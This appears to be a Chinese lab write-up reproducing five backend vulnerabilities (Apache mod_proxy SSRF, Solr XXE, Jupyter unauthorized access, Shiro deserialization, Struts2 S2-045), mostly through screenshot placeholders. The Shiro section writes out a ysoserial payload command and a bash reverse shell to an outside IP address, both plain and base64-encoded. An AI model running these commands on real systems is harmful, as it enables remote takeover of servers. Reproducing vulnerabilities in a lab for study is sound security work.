后端漏洞(下)


Apache HTTPD 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438)

\1. 复现

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

\2. 访问http://www.cqupt.esdu.cn

img

Apache solr XXE漏洞(CVE-2017-12629)

\1. 复现环境中的XXE漏洞

图形用户界面, 文本, 应用程序  描述已自动生成

\2. 利用XXE漏洞发送HTTP请求,在VPS服务器接收请求,或收到DNS记录。(SSRF利用)

img

img3. 利用XXE漏洞读取本地的 /etc/passwd文件。(文件读取利用)

python开启http服务器

/usr/bin/python3.6 -m http.server 2333

img

Jupyter Notebook 未授权访问漏洞

\1. 复现环境中的未授权访问漏洞,登录Jupyter Web管理界面

图形用户界面, 文本, 应用程序, Word  描述已自动生成

\2. 利用Jupyter Notebook控制台执行系统命令,读取/etc/passwd内容

电脑萤幕的截图  描述已自动生成

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

\1. 复现环境中的反序列化漏洞

构造poc.ser

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 “touch /tmp/success” > poc.ser

对序列化文件ACE加密并Base64编码后提交

img

图形用户界面, 文本, 应用程序  描述已自动生成

成功生成/tmp/success

\2. 尝试利用漏洞执行系统命令,列出/etc目录的文件结构

通过反弹shell执行

构造反弹shell命令:bash -i >& /dev/tcp/47.109.111.193/2333 0>&1

对命令作base64处理:

bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDkuMTExLjE5My8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}

ysoserial构造序列化文件:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 “bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDkuMTExLjE5My8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}” > poc.ser

对poc.ser作ACE加密并Base64编码后提交:

img

电脑萤幕的截图  描述已自动生成

Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)

\1. 复现环境中的OGNL表达式注入漏洞

img

\2. 尝试利用漏洞执行系统命令,读取当前目录下的pom.xml内容

图形用户界面, 文本, 应用程序  描述已自动生成

Comments

Leave a comment